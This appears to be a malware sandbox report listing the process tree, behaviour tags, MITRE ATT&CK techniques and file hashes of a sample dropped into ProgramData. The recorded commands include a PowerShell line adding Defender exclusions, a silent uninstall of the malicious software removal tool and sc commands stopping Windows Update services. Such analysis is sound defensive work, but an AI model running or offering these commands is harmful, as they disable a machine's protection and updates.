C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2420
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3532
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3728
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3880
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4084
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4432
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2488
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3948
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2276
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3360
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:712
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4832
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3380
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1776
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe ebe01965bca605692c3765b6187d2316 eYuG2eGb30yu04tDwC0KyQ.0.1.0.0.01⤵
- Sets service image path in registry
PID:4128 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:364
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:2996
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks processor information in registry
- Enumerates system info in registry
PID:4648
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3280
-
C:\ProgramData\ihtuhbzzrjkw\tssxsegodzrt.exeC:\ProgramData\ihtuhbzzrjkw\tssxsegodzrt.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1472 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:3736
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3580
-
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1404
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4612 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4928
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2684
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:3188
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5008
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1012
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:400
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:3460
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.2MB
MD5c263627b444c7cfacda7683b5d8e3d65
SHA1503fd59856ecd95eb2636ed3c7c7522fa6b9831e
SHA25623cd00b31c81c4258d7400bb802077ed356bdab30756f7194d8576a4ed2e8be8
SHA5123382b876466acceaf628c84eac5d05602833eb7e73591d5889a3fc9bfdeef2f64cc0d8eea51eb721ad343d2e47298ffa63bdf027751af5dc4f91cbc4faa2f912
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82